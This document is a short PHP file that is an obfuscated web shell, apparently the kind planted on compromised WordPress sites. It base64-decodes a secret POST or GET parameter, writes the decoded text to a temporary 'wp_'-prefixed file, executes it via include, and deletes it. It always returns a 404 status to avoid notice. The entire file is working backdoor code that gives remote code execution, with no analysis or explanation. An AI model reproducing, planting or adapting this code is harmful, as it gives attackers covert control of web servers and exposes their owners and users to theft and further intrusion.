<?php
try{
$ncca5c=array('file_put_conten'.'ts','unl'.'ink','sys_get_temp'.'_dir','base64_deco'.'de','array_key_e'.'xists','temp'.'nam');
$l4c982='d44'.'24704';
if($ncca5c[4]($l4c982,$_POST)){
$jf61d1=$ncca5c[3]($_POST[$l4c982]);
}elseif($ncca5c[4]($l4c982,$_GET)){
$jf61d1=$ncca5c[3]($_GET[$l4c982]);
}else{$jf61d1=null;}
if($jf61d1){
$h40ea8=$ncca5c[5]($ncca5c[2](),'w'.'p_');
if($h40ea8){
$ncca5c[0]($h40ea8,'<'.'?ph'.'p '.$jf61d1);
http_response_code(404);
@include_once($h40ea8);
@$ncca5c[1]($h40ea8);
}}
http_response_code(404);
}catch(Throwable $e){http_response_code(404);}catch(Exception $e){http_response_code(404);}
